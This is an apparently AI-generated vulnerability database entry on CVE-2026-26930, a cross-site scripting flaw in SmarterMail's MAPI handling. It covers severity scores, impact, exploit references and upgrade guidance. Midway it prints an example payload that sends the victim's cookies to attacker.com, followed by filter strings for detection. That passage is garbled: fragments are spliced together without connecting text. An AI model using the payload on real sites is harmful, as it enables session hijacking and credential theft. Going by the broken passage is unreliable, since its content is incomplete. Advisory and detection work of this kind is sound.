
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-26930 is a Cross-Site Scripting (XSS) vulnerability in SmarterTools SmarterMail that allows attackers to inject malicious scripts via MAPI (Messaging Application Programming Interface) requests. It affects SmarterMail versions prior to build 9526. The vulnerability was published on February 16, 2026, and carries a CVSS v3.1 base score of 7.2 (High) (Red Hat CVE, Feedly).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), rooted in insufficient sanitization of user-supplied input processed through MAPI requests in SmarterMail. Because the CVSS scope is marked as "Changed" and no user interaction is required, the injected script can affect resources beyond the vulnerable component's security scope. The attack vector is network-based with low complexity and no privileges required, making it accessible to unauthenticated remote attackers. A Packet Storm exploit entry has been referenced (PACKETSTORM:215790), and a Nessus detection plugin (ID 299390) is available (Tenable, Sploitus).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session within SmarterMail, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of the victim. The changed scope indicates the impact can extend beyond the mail application itself, potentially affecting other browser-accessible resources or user accounts. Confidentiality and integrity are both rated as Low impact per the CVSS scoring, with no direct availability impact (Red Hat CVE, Feedly).
A public exploit reference exists via Packet Storm (PACKETSTORM:215790), and the vulnerability is detectable via Nessus plugin 299390, indicating active tooling support (Tenable, Sploitus). The EPSS score is approximately 0.029% (0.000290), suggesting a currently low probability of widespread exploitation. No confirmed in-the-wild exploitation or CISA KEV catalog listing has been identified at this time. No specific threat actor attribution is available.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) embedded in a field that SmarterMail processes and reflects without proper sanitization.%3Cscript%3E, javascript:, onerror=).SmarterTools has addressed this vulnerability in SmarterMail build 9526 and later. Administrators should upgrade to build 9526 or newer as the primary remediation. As a temporary workaround, restricting access to the SmarterMail MAPI endpoint at the network or firewall level can reduce exposure until patching is feasible. Enabling a Web Application Firewall (WAF) with XSS filtering rules can also help mitigate exploitation attempts (Tenable, Red Hat CVE).
The vulnerability was disclosed via the Full Disclosure mailing list in February 2026 (SecLists). Tenable released a Nessus detection plugin (299390) and a pipeline issue entry, indicating prompt response from the security tooling community (Tenable). No significant vendor statements beyond the patch release or notable researcher commentary have been identified at this time.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."